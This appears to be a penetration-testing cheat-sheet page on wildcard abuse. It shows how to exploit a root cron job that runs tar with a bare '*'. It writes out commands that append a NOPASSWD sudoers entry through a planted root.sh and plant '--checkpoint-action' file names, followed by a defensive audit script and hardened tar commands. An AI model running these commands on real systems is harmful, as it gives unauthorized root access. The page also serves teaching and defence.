Wildcard Abuse
Character   Significance
*           An asterisk that can match any number of characters in a file name.
?           Matches a single character.
[ ]         Brackets enclose characters and can match any single one at the defined position.
~           A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory.
-           A hyphen within brackets will denote a range of characters.
Sample Exploitation
Assume there is a cron job like this:
# m h dom mon dow command
*/01 * * * * cd /root && tar -zcf /tmp/backup.tar.gz *
Use these commands (similar to the ones on GTFOBins):
$ echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
$ echo "" > "--checkpoint-action=exec=sh root.sh"
$ echo "" > --checkpoint=1
$ ls -la
total 56
drwxrwxrwt 10 root root 4096 Aug 31 23:12 .
drwxr-xr-x 24 root root 4096 Aug 31 02:24 ..
-rw-r--r-- 1 root root 378 Aug 31 23:12 backup.tar.gz
-rw-rw-r-- 1 cliff.moore cliff.moore 1 Aug 31 23:11 --checkpoint=1
-rw-rw-r-- 1 cliff.moore cliff.moore 1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh
drwxrwxrwt 2 root root 4096 Aug 31 22:36 .font-unix
drwxrwxrwt 2 root root 4096 Aug 31 22:36 .ICE-unix
-rw-rw-r-- 1 cliff.moore cliff.moore 60 Aug 31 23:11 root.sh
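Once the cron job runs, the shell expands * to the file names in the directory, tar treats the names that begin with -- as options, and root.sh is executed as root, so we gain root.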
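For the defensive side of the cron job above, this added example (not part of the original page; the function names and the sample directory are constructed) shows that a bare * hands dash-prefixed file names to a command as arguments while ./* does not, and lists such names in a directory for auditing.

```shell
#!/bin/sh
# Added example, not from the original page. Function names and the sample
# directory are constructed for illustration.

# Count the arguments a glob produces that a command would parse as options.
# $1 = directory, $2 = "bare" (expands *) or "prefixed" (expands ./*)
option_like_args() {
    (
        cd "$1" || exit 1
        if [ "$2" = bare ]; then set -- *; else set -- ./*; fi
        n=0
        for a in "$@"; do
            case $a in -*) n=$((n + 1)) ;; esac
        done
        echo "$n"
    )
}

# Audit helper: print entries in directory $1 whose names begin with "-".
dash_named_entries() {
    for f in "$1"/-*; do
        [ -e "$f" ] && printf '%s\n' "${f##*/}"
    done
    return 0
}

# Build a constructed sample directory: two ordinary files plus the two
# option-like names from the listing above (all empty files).
make_sample_dir() {
    d=$(mktemp -d) || return 1
    : > "$d/notes.txt"
    : > "$d/report.csv"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=sh root.sh"
    echo "$d"
}

demo_dir=$(make_sample_dir)
echo "bare *  -> option-like arguments: $(option_like_args "$demo_dir" bare)"
echo "./*     -> option-like arguments: $(option_like_args "$demo_dir" prefixed)"
echo "names to investigate:"
dash_named_entries "$demo_dir"
rm -rf "$demo_dir"

# Hardened forms of the cron command (either one is enough):
#   cd /root && tar -zcf /tmp/backup.tar.gz ./*
#   cd /root && tar -zcf /tmp/backup.tar.gz -- *
```

Running dash_named_entries against any directory that a privileged job globs and that other users can write to gives a quick audit of names that would be parsed as options.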